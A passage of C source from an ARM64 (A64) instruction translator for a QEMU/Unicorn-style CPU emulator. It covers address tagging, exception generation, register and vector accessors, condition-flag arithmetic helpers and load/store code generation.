        tcg_gen_mov_i64(tcg_ctx, dst, src);
    } else if (!regime_has_2_ranges(s->mmu_idx)) {
        /* Force tag byte to all zero */
        tcg_gen_extract_i64(tcg_ctx, dst, src, 0, 56);
    } else {
        /* Sign-extend from bit 55. */
        tcg_gen_sextract_i64(tcg_ctx, dst, src, 0, 56);

        if (tbi != 3) {
            TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0);

            /*
             * The two TBI bits differ.
             * If tbi0, then !tbi1: only use the extension if positive.
             * If !tbi0, then tbi1: only use the extension if negative.
             */
            tcg_gen_movcond_i64(tcg_ctx, tbi == 1 ? TCG_COND_GE : TCG_COND_LT,
                                dst, dst, tcg_zero, dst, src);
            tcg_temp_free_i64(tcg_ctx, tcg_zero);
        }
    }
}

static void gen_a64_set_pc(DisasContext *s, TCGv_i64 src)
{
    /*
     * If address tagging is enabled for instructions via the TCR TBI bits,
     * then loading an address into the PC will clear out any tag.
     */
    gen_top_byte_ignore(s, s->uc->tcg_ctx->cpu_pc_arm64, src, s->tbii);
}

/*
 * Return a "clean" address for ADDR according to TBID.
 * This is always a fresh temporary, as we need to be able to
 * increment this independently of a dirty write-back address.
 */
static TCGv_i64 clean_data_tbi(DisasContext *s, TCGv_i64 addr)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i64 clean = new_tmp_a64(s);
    /*
     * In order to get the correct value in the FAR_ELx register,
     * we must present the memory subsystem with the "dirty" address
     * including the TBI. In system mode we can make this work via
     * the TLB, dropping the TBI during translation. But for user-only
     * mode we don't have that option, and must remove the top byte now.
     */
    tcg_gen_mov_i64(tcg_ctx, clean, addr);
    return clean;
}

typedef struct DisasCompare64 {
    TCGCond cond;
    TCGv_i64 value;
} DisasCompare64;

static void a64_test_cc(TCGContext *tcg_ctx, DisasCompare64 *c64, int cc)
{
    DisasCompare c32;

    arm_test_cc(tcg_ctx, &c32, cc);

    /* Sign-extend the 32-bit value so that the GE/LT comparisons work
     * properly. The NE/EQ comparisons are also fine with this choice.
*/ c64->cond = c32.cond; c64->value = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, c64->value, c32.value); arm_free_cc(tcg_ctx, &c32); } static void a64_free_cc(TCGContext *tcg_ctx, DisasCompare64 *c64) { tcg_temp_free_i64(tcg_ctx, c64->value); } static void gen_exception_internal(TCGContext *tcg_ctx, int excp) { TCGv_i32 tcg_excp = tcg_const_i32(tcg_ctx, excp); assert(excp_is_internal(excp)); gen_helper_exception_internal(tcg_ctx, tcg_ctx->cpu_env, tcg_excp); tcg_temp_free_i32(tcg_ctx, tcg_excp); } static void gen_exception_internal_insn(DisasContext *s, uint64_t pc, int excp) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_a64_set_pc_im(tcg_ctx, pc); gen_exception_internal(tcg_ctx, excp); s->base.is_jmp = DISAS_NORETURN; } static void gen_exception_insn(DisasContext *s, uint64_t pc, int excp, uint32_t syndrome, uint32_t target_el) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_a64_set_pc_im(tcg_ctx, pc); gen_exception(tcg_ctx, excp, syndrome, target_el); s->base.is_jmp = DISAS_NORETURN; } static void gen_exception_bkpt_insn(DisasContext *s, uint32_t syndrome) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_syn; gen_a64_set_pc_im(tcg_ctx, s->pc_curr); tcg_syn = tcg_const_i32(tcg_ctx, syndrome); gen_helper_exception_bkpt_insn(tcg_ctx, tcg_ctx->cpu_env, tcg_syn); tcg_temp_free_i32(tcg_ctx, tcg_syn); s->base.is_jmp = DISAS_NORETURN; } static void gen_step_complete_exception(DisasContext *s) { /* We just completed step of an insn. Move from Active-not-pending * to Active-pending, and then also take the swstep exception. * This corresponds to making the (IMPDEF) choice to prioritize * swstep exceptions over asynchronous exceptions taken to an exception * level where debug is disabled. This choice has the advantage that * we do not need to maintain internal state corresponding to the * ISV/EX syndrome bits between completion of the step and generation * of the exception, and our syndrome information is always correct. 
     */
    gen_ss_advance(s);
    gen_swstep_exception(s, 1, s->is_ldex);
    s->base.is_jmp = DISAS_NORETURN;
}

static inline bool use_goto_tb(DisasContext *s, int n, uint64_t dest)
{
    struct uc_struct *uc = s->uc;

    /* No direct tb linking with singlestep (either QEMU's or the ARM
     * debug architecture kind) or deterministic io
     */
    if (s->base.singlestep_enabled || s->ss_active ||
        (tb_cflags(s->base.tb) & CF_LAST_IO)) {
        return false;
    }

    /* Only link tbs from inside the same guest page */
    if ((s->base.tb->pc & TARGET_PAGE_MASK) != (dest & TARGET_PAGE_MASK)) {
        return false;
    }

    return true;
}

static inline void gen_goto_tb(DisasContext *s, int n, uint64_t dest)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TranslationBlock *tb;

    tb = s->base.tb;
    if (use_goto_tb(s, n, dest)) {
        tcg_gen_goto_tb(tcg_ctx, n);
        gen_a64_set_pc_im(tcg_ctx, dest);
        tcg_gen_exit_tb(tcg_ctx, tb, n);
        s->base.is_jmp = DISAS_NORETURN;
    } else {
        gen_a64_set_pc_im(tcg_ctx, dest);
        if (s->ss_active) {
            gen_step_complete_exception(s);
        } else if (s->base.singlestep_enabled) {
            gen_exception_internal(tcg_ctx, EXCP_DEBUG);
        } else {
            tcg_gen_lookup_and_goto_ptr(tcg_ctx);
            s->base.is_jmp = DISAS_NORETURN;
        }
    }
}

void unallocated_encoding(DisasContext *s)
{
    /* Unallocated and reserved encodings are uncategorized */
    gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_uncategorized(),
                       default_exception_el(s));
}

static void init_tmp_a64_array(DisasContext *s)
{
#ifdef CONFIG_DEBUG_TCG
    memset(s->tmp_a64, 0, sizeof(s->tmp_a64));
#endif
    s->tmp_a64_count = 0;
}

static void free_tmp_a64(DisasContext *s)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int i;
    for (i = 0; i < s->tmp_a64_count; i++) {
        tcg_temp_free_i64(tcg_ctx, s->tmp_a64[i]);
    }
    init_tmp_a64_array(s);
}

TCGv_i64 new_tmp_a64(DisasContext *s)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    assert(s->tmp_a64_count < TMP_A64_MAX);
    return s->tmp_a64[s->tmp_a64_count++] = tcg_temp_new_i64(tcg_ctx);
}

TCGv_i64 new_tmp_a64_zero(DisasContext *s)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i64 t = new_tmp_a64(s);
    tcg_gen_movi_i64(tcg_ctx, t, 0);
    return t;
}

/*
 * Register access functions
 *
 * These functions are used for directly accessing a register where
 * changes to the final register value are likely to be made. If you
 * need to use a register for temporary calculation (e.g. index type
 * operations) use the read_* form.
 *
 * B1.2.1 Register mappings
 *
 * In instruction register encoding 31 can refer to ZR (zero register) or
 * the SP (stack pointer) depending on context. In QEMU's case we map SP
 * to cpu_X[31] and ZR accesses to a temporary which can be discarded.
 * This is the point of the _sp forms.
 */
TCGv_i64 cpu_reg(DisasContext *s, int reg)
{
    if (reg == 31) {
        return new_tmp_a64_zero(s);
    } else {
        return s->uc->tcg_ctx->cpu_X[reg];
    }
}

/* register access for when 31 == SP */
TCGv_i64 cpu_reg_sp(DisasContext *s, int reg)
{
    return s->uc->tcg_ctx->cpu_X[reg];
}

/* read a cpu register in 32bit/64bit mode. Returns a TCGv_i64
 * representing the register contents. This TCGv is an auto-freed
 * temporary so it need not be explicitly freed, and may be modified.
*/ TCGv_i64 read_cpu_reg(DisasContext *s, int reg, int sf) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 v = new_tmp_a64(s); if (reg != 31) { if (sf) { tcg_gen_mov_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); } else { tcg_gen_ext32u_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); } } else { tcg_gen_movi_i64(tcg_ctx, v, 0); } return v; } TCGv_i64 read_cpu_reg_sp(DisasContext *s, int reg, int sf) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 v = new_tmp_a64(s); if (sf) { tcg_gen_mov_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); } else { tcg_gen_ext32u_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); } return v; } /* Return the offset into CPUARMState of a slice (from * the least significant end) of FP register Qn (ie * Dn, Sn, Hn or Bn). * (Note that this is not the same mapping as for A32; see cpu.h) */ static inline int fp_reg_offset(DisasContext *s, int regno, MemOp size) { return vec_reg_offset(s, regno, 0, size); } /* Offset of the high half of the 128 bit vector Qn */ static inline int fp_reg_hi_offset(DisasContext *s, int regno) { return vec_reg_offset(s, regno, 1, MO_64); } /* Convenience accessors for reading and writing single and double * FP registers. Writing clears the upper parts of the associated * 128 bit vector register, as required by the architecture. * Note that unlike the GP register accessors, the values returned * by the read functions must be manually freed. */ static TCGv_i64 read_fp_dreg(DisasContext *s, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 v = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, v, tcg_ctx->cpu_env, fp_reg_offset(s, reg, MO_64)); return v; } static TCGv_i32 read_fp_sreg(DisasContext *s, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 v = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, v, tcg_ctx->cpu_env, fp_reg_offset(s, reg, MO_32)); return v; } static TCGv_i32 read_fp_hreg(DisasContext *s, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 v = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld16u_i32(tcg_ctx, v, tcg_ctx->cpu_env, fp_reg_offset(s, reg, MO_16)); return v; } /* Clear the bits above an N-bit vector, for N = (is_q ? 128 : 64). * If SVE is not enabled, then there are only 128 bits in the vector. */ static void clear_vec_high(DisasContext *s, bool is_q, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned ofs = fp_reg_offset(s, rd, MO_64); unsigned vsz = vec_full_reg_size(s); if (!is_q) { TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_st_i64(tcg_ctx, tcg_zero, tcg_ctx->cpu_env, ofs + 8); tcg_temp_free_i64(tcg_ctx, tcg_zero); } if (vsz > 16) { tcg_gen_gvec_dup8i(tcg_ctx, ofs + 16, vsz - 16, vsz - 16, 0); } } void write_fp_dreg(DisasContext *s, int reg, TCGv_i64 v) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned ofs = fp_reg_offset(s, reg, MO_64); tcg_gen_st_i64(tcg_ctx, v, tcg_ctx->cpu_env, ofs); clear_vec_high(s, false, reg); } static void write_fp_sreg(DisasContext *s, int reg, TCGv_i32 v) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, tmp, v); write_fp_dreg(s, reg, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } TCGv_ptr get_fpstatus_ptr(TCGContext *tcg_ctx, bool is_f16) { TCGv_ptr statusptr = tcg_temp_new_ptr(tcg_ctx); int offset; /* In A64 all instructions (both FP and Neon) use the FPCR; there * is no equivalent of the A32 Neon "standard FPSCR value". * However half-precision operations operate under a different * FZ16 flag and use vfp.fp_status_f16 instead of vfp.fp_status. 
*/ if (is_f16) { offset = offsetof(CPUARMState, vfp.fp_status_f16); } else { offset = offsetof(CPUARMState, vfp.fp_status); } tcg_gen_addi_ptr(tcg_ctx, statusptr, tcg_ctx->cpu_env, offset); return statusptr; } /* Expand a 2-operand AdvSIMD vector operation using an expander function. */ static void gen_gvec_fn2(DisasContext *s, bool is_q, int rd, int rn, GVecGen2Fn *gvec_fn, int vece) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gvec_fn(tcg_ctx, vece, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), is_q ? 16 : 8, vec_full_reg_size(s)); } /* Expand a 2-operand + immediate AdvSIMD vector operation using * an expander function. */ static void gen_gvec_fn2i(DisasContext *s, bool is_q, int rd, int rn, int64_t imm, GVecGen2iFn *gvec_fn, int vece) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gvec_fn(tcg_ctx, vece, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), imm, is_q ? 16 : 8, vec_full_reg_size(s)); } /* Expand a 3-operand AdvSIMD vector operation using an expander function. */ static void gen_gvec_fn3(DisasContext *s, bool is_q, int rd, int rn, int rm, GVecGen3Fn *gvec_fn, int vece) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gvec_fn(tcg_ctx, vece, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), is_q ? 16 : 8, vec_full_reg_size(s)); } /* Expand a 4-operand AdvSIMD vector operation using an expander function. */ static void gen_gvec_fn4(DisasContext *s, bool is_q, int rd, int rn, int rm, int rx, GVecGen4Fn *gvec_fn, int vece) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gvec_fn(tcg_ctx, vece, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), vec_full_reg_offset(s, rx), is_q ? 16 : 8, vec_full_reg_size(s)); } /* Expand a 2-operand + immediate AdvSIMD vector operation using * an op descriptor. */ static void gen_gvec_op2i(DisasContext *s, bool is_q, int rd, int rn, int64_t imm, const GVecGen2i *gvec_op) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_gvec_2i(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), is_q ? 16 : 8, vec_full_reg_size(s), imm, gvec_op); } /* Expand a 3-operand AdvSIMD vector operation using an op descriptor. */ static void gen_gvec_op3(DisasContext *s, bool is_q, int rd, int rn, int rm, const GVecGen3 *gvec_op) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_gvec_3(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), is_q ? 16 : 8, vec_full_reg_size(s), gvec_op); } /* Expand a 3-operand operation using an out-of-line helper. */ static void gen_gvec_op3_ool(DisasContext *s, bool is_q, int rd, int rn, int rm, int data, gen_helper_gvec_3 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), is_q ? 16 : 8, vec_full_reg_size(s), data, fn); } /* Expand a 3-operand + env pointer operation using * an out-of-line helper. */ static void gen_gvec_op3_env(DisasContext *s, bool is_q, int rd, int rn, int rm, gen_helper_gvec_3_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), tcg_ctx->cpu_env, is_q ? 16 : 8, vec_full_reg_size(s), 0, fn); } /* Expand a 3-operand + fpstatus pointer + simd data value operation using * an out-of-line helper. 
*/ static void gen_gvec_op3_fpst(DisasContext *s, bool is_q, int rd, int rn, int rm, bool is_fp16, int data, gen_helper_gvec_3_ptr *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, is_fp16); tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), vec_full_reg_offset(s, rm), fpst, is_q ? 16 : 8, vec_full_reg_size(s), data, fn); tcg_temp_free_ptr(tcg_ctx, fpst); } /* Set ZF and NF based on a 64 bit result. This is alas fiddlier * than the 32 bit equivalent. */ static inline void gen_set_NZ64(TCGContext *tcg_ctx, TCGv_i64 result) { tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF, result); tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); } /* Set NZCV as for a logical operation: NZ as per result, CV cleared. */ static inline void gen_logic_CC(TCGContext *tcg_ctx, int sf, TCGv_i64 result) { if (sf) { gen_set_NZ64(tcg_ctx, result); } else { tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_ZF, result); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_ZF); } tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_CF, 0); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_VF, 0); } /* dest = T0 + T1; compute C, N, V and Z flags */ static void gen_add_CC(TCGContext *tcg_ctx, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) { if (sf) { TCGv_i64 result, flag, tmp; result = tcg_temp_new_i64(tcg_ctx); flag = tcg_temp_new_i64(tcg_ctx); tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_movi_i64(tcg_ctx, tmp, 0); tcg_gen_add2_i64(tcg_ctx, result, flag, t0, tmp, t1, tmp); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_CF, flag); gen_set_NZ64(tcg_ctx, result); tcg_gen_xor_i64(tcg_ctx, flag, result, t0); tcg_gen_xor_i64(tcg_ctx, tmp, t0, t1); tcg_gen_andc_i64(tcg_ctx, flag, flag, tmp); tcg_temp_free_i64(tcg_ctx, tmp); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_VF, flag); tcg_gen_mov_i64(tcg_ctx, dest, result); tcg_temp_free_i64(tcg_ctx, result); tcg_temp_free_i64(tcg_ctx, flag); } else { /* 32 bit arithmetic */ TCGv_i32 t0_32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1_32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp, 0); tcg_gen_extrl_i64_i32(tcg_ctx, t0_32, t0); tcg_gen_extrl_i64_i32(tcg_ctx, t1_32, t1); tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0_32, tmp, t1_32, tmp); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0_32); tcg_gen_xor_i32(tcg_ctx, tmp, t0_32, t1_32); tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); tcg_gen_extu_i32_i64(tcg_ctx, dest, tcg_ctx->cpu_NF); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, t0_32); tcg_temp_free_i32(tcg_ctx, t1_32); } } /* dest = T0 - T1; compute C, N, V and Z flags */ static void gen_sub_CC(TCGContext *tcg_ctx, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) { if (sf) { /* 64 bit arithmetic */ TCGv_i64 result, flag, tmp; result = tcg_temp_new_i64(tcg_ctx); flag = tcg_temp_new_i64(tcg_ctx); tcg_gen_sub_i64(tcg_ctx, result, t0, t1); gen_set_NZ64(tcg_ctx, result); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_GEU, flag, t0, t1); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_CF, flag); tcg_gen_xor_i64(tcg_ctx, flag, result, t0); tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_xor_i64(tcg_ctx, tmp, t0, t1); tcg_gen_and_i64(tcg_ctx, flag, flag, tmp); tcg_temp_free_i64(tcg_ctx, tmp); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_VF, flag); tcg_gen_mov_i64(tcg_ctx, dest, result); tcg_temp_free_i64(tcg_ctx, flag); tcg_temp_free_i64(tcg_ctx, result); } else 
{ /* 32 bit arithmetic */ TCGv_i32 t0_32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1_32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tmp; tcg_gen_extrl_i64_i32(tcg_ctx, t0_32, t0); tcg_gen_extrl_i64_i32(tcg_ctx, t1_32, t1); tcg_gen_sub_i32(tcg_ctx, tcg_ctx->cpu_NF, t0_32, t1_32); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_CF, t0_32, t1_32); tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0_32); tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, tmp, t0_32, t1_32); tcg_temp_free_i32(tcg_ctx, t0_32); tcg_temp_free_i32(tcg_ctx, t1_32); tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); tcg_temp_free_i32(tcg_ctx, tmp); tcg_gen_extu_i32_i64(tcg_ctx, dest, tcg_ctx->cpu_NF); } } /* dest = T0 + T1 + CF; do not compute flags. */ static void gen_adc(TCGContext *tcg_ctx, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) { TCGv_i64 flag = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, flag, tcg_ctx->cpu_CF); tcg_gen_add_i64(tcg_ctx, dest, t0, t1); tcg_gen_add_i64(tcg_ctx, dest, dest, flag); tcg_temp_free_i64(tcg_ctx, flag); if (!sf) { tcg_gen_ext32u_i64(tcg_ctx, dest, dest); } } /* dest = T0 + T1 + CF; compute C, N, V and Z flags. */ static void gen_adc_CC(TCGContext *tcg_ctx, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) { if (sf) { TCGv_i64 result, cf_64, vf_64, tmp; result = tcg_temp_new_i64(tcg_ctx); cf_64 = tcg_temp_new_i64(tcg_ctx); vf_64 = tcg_temp_new_i64(tcg_ctx); tmp = tcg_const_i64(tcg_ctx, 0); tcg_gen_extu_i32_i64(tcg_ctx, cf_64, tcg_ctx->cpu_CF); tcg_gen_add2_i64(tcg_ctx, result, cf_64, t0, tmp, cf_64, tmp); tcg_gen_add2_i64(tcg_ctx, result, cf_64, result, cf_64, t1, tmp); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_CF, cf_64); gen_set_NZ64(tcg_ctx, result); tcg_gen_xor_i64(tcg_ctx, vf_64, result, t0); tcg_gen_xor_i64(tcg_ctx, tmp, t0, t1); tcg_gen_andc_i64(tcg_ctx, vf_64, vf_64, tmp); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_VF, vf_64); tcg_gen_mov_i64(tcg_ctx, dest, result); tcg_temp_free_i64(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, vf_64); tcg_temp_free_i64(tcg_ctx, cf_64); tcg_temp_free_i64(tcg_ctx, result); } else { TCGv_i32 t0_32, t1_32, tmp; t0_32 = tcg_temp_new_i32(tcg_ctx); t1_32 = tcg_temp_new_i32(tcg_ctx); tmp = tcg_const_i32(tcg_ctx, 0); tcg_gen_extrl_i64_i32(tcg_ctx, t0_32, t0); tcg_gen_extrl_i64_i32(tcg_ctx, t1_32, t1); tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0_32, tmp, tcg_ctx->cpu_CF, tmp); tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t1_32, tmp); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0_32); tcg_gen_xor_i32(tcg_ctx, tmp, t0_32, t1_32); tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); tcg_gen_extu_i32_i64(tcg_ctx, dest, tcg_ctx->cpu_NF); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, t1_32); tcg_temp_free_i32(tcg_ctx, t0_32); } } /* * Load/Store generators */ /* * Store from GPR register to memory. 
*/ static void do_gpr_st_memidx(DisasContext *s, TCGv_i64 source, TCGv_i64 tcg_addr, int size, int memidx, bool iss_valid, unsigned int iss_srt, bool iss_sf, bool iss_ar) { TCGContext *tcg_ctx = s->uc->tcg_ctx; g_assert(size <= 3); tcg_gen_qemu_st_i64(tcg_ctx, source, tcg_addr, memidx, s->be_data + size); if (iss_valid) { uint32_t syn; syn = syn_data_abort_with_iss(0, size, false, iss_srt, iss_sf, iss_ar, 0, 0, 0, 0, 0, false); disas_set_insn_syndrome(s, syn); } } static void do_gpr_st(DisasContext *s, TCGv_i64 source, TCGv_i64 tcg_addr, int size, bool iss_valid, unsigned int iss_srt, bool iss_sf, bool iss_ar) { do_gpr_st_memidx(s, source, tcg_addr, size, get_mem_index(s), iss_valid, iss_srt, iss_sf, iss_ar); } /* * Load from memory to GPR register */ static void do_gpr_ld_memidx(DisasContext *s, TCGv_i64 dest, TCGv_i64 tcg_addr, int size, bool is_signed, bool extend, int memidx, bool iss_valid, unsigned int iss_srt, bool iss_sf, bool iss_ar) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp memop = s->be_data + size; g_assert(size <= 3); if (is_signed) { memop += MO_SIGN; } tcg_gen_qemu_ld_i64(tcg_ctx, dest, tcg_addr, memidx, memop); if (extend && is_signed) { g_assert(size < 3); tcg_gen_ext32u_i64(tcg_ctx, dest, dest); } if (iss_valid) { uint32_t syn; syn = syn_data_abort_with_iss(0, size, is_signed, iss_srt, iss_sf, iss_ar, 0, 0, 0, 0, 0, false); disas_set_insn_syndrome(s, syn); } } static void do_gpr_ld(DisasContext *s, TCGv_i64 dest, TCGv_i64 tcg_addr, int size, bool is_signed, bool extend, bool iss_valid, unsigned int iss_srt, bool iss_sf, bool iss_ar) { do_gpr_ld_memidx(s, dest, tcg_addr, size, is_signed, extend, get_mem_index(s), iss_valid, iss_srt, iss_sf, iss_ar); } /* * Store from FP register to memory */ static void do_fp_st(DisasContext *s, int srcidx, TCGv_i64 tcg_addr, int size) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* This writes the bottom N bits of a 128 bit wide vector to memory */ TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, fp_reg_offset(s, srcidx, MO_64)); if (size < 4) { tcg_gen_qemu_st_i64(tcg_ctx, tmp, tcg_addr, get_mem_index(s), s->be_data + size); } else { bool be = s->be_data == MO_BE; TCGv_i64 tcg_hiaddr = tcg_temp_new_i64(tcg_ctx); tcg_gen_addi_i64(tcg_ctx, tcg_hiaddr, tcg_addr, 8); tcg_gen_qemu_st_i64(tcg_ctx, tmp, be ? tcg_hiaddr : tcg_addr, get_mem_index(s), s->be_data | MO_Q); tcg_gen_ld_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, fp_reg_hi_offset(s, srcidx)); tcg_gen_qemu_st_i64(tcg_ctx, tmp, be ? tcg_addr : tcg_hiaddr, get_mem_index(s), s->be_data | MO_Q); tcg_temp_free_i64(tcg_ctx, tcg_hiaddr); } tcg_temp_free_i64(tcg_ctx, tmp); } /* * Load from memory to FP register */ static void do_fp_ld(DisasContext *s, int destidx, TCGv_i64 tcg_addr, int size) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* This always zero-extends and writes to a full 128 bit wide vector */ TCGv_i64 tmplo = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tmphi; if (size < 4) { MemOp memop = s->be_data + size; tmphi = tcg_const_i64(tcg_ctx, 0); tcg_gen_qemu_ld_i64(tcg_ctx, tmplo, tcg_addr, get_mem_index(s), memop); } else { bool be = s->be_data == MO_BE; TCGv_i64 tcg_hiaddr; tmphi = tcg_temp_new_i64(tcg_ctx); tcg_hiaddr = tcg_temp_new_i64(tcg_ctx); tcg_gen_addi_i64(tcg_ctx, tcg_hiaddr, tcg_addr, 8); tcg_gen_qemu_ld_i64(tcg_ctx, tmplo, be ? tcg_hiaddr : tcg_addr, get_mem_index(s), s->be_data | MO_Q); tcg_gen_qemu_ld_i64(tcg_ctx, tmphi, be ? 
tcg_addr : tcg_hiaddr, get_mem_index(s), s->be_data | MO_Q); tcg_temp_free_i64(tcg_ctx, tcg_hiaddr); } tcg_gen_st_i64(tcg_ctx, tmplo, tcg_ctx->cpu_env, fp_reg_offset(s, destidx, MO_64)); tcg_gen_st_i64(tcg_ctx, tmphi, tcg_ctx->cpu_env, fp_reg_hi_offset(s, destidx)); tcg_temp_free_i64(tcg_ctx, tmplo); tcg_temp_free_i64(tcg_ctx, tmphi); clear_vec_high(s, true, destidx); } /* * Vector load/store helpers. * * The principal difference between this and a FP load is that we don't * zero extend as we are filling a partial chunk of the vector register. * These functions don't support 128 bit loads/stores, which would be * normal load/store operations. * * The _i32 versions are useful when operating on 32 bit quantities * (eg for floating point single or using Neon helper functions). */ /* Get value of an element within a vector register */ static void read_vec_element(DisasContext *s, TCGv_i64 tcg_dest, int srcidx, int element, MemOp memop) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int vect_off = vec_reg_offset(s, srcidx, element, memop & MO_SIZE); switch (memop) { case MO_8: tcg_gen_ld8u_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); break; case MO_16: tcg_gen_ld16u_i64(tcg_ctx, tcg_dest, 